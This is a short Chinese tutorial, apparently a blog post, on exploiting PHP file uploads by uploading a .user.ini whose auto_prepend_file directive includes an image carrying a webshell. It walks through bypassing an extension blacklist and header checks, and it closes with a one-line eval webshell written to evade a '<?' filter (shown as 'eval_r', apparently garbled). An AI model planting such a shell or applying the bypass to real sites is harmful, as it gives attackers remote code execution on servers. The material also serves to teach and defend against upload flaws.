文件上传漏洞之.user.ini

.user.ini

.user.ini是php的一种配置文件，众所周知php.ini是php的配置文件，它可以做到显示报错，导入扩展，文件解析，web站点路径等等设置

使用条件：

(1)服务器脚本语言为PHP
(2)对应目录下面有可执行的php文件
(3)服务器使用CGI／FastCGI模式

优势跟.htaccess后门比，适用范围更广，nginx/apache/IIS都有效，而.htaccess只适用于apache

auto_prepend_file/auto_append_file

这两个配置可以在php文件执行之前先包含制定的文件，所以我们可以上传一个图片马，这样就可以通过.user.ini使得这个图片马被包含，从而获取webshell

漏洞复现：

这里使用黑名单把尾缀限制的死死的，也会检测图片的文件头和内容，但是在上传成功一张图片后发现，同级目录下有php文件，于是便尝试上传.user.ini

制作.user.ini：
auto_prepend_file=a.jpg，但是由于会检测文件头，所以要手动添加上去

上传.user.ini,如果上传成功，路径下的php文件会包含a.jpg

可以看到这里已经是上传成功了，只要再上传一张带着马的a.jpg即可以实现包含

这边对图片的内容做了过滤，把<?字符不可出现，但是这并不能阻止我们；
绕过姿势：<script language="php">@eval_r($_POST[pass])</script>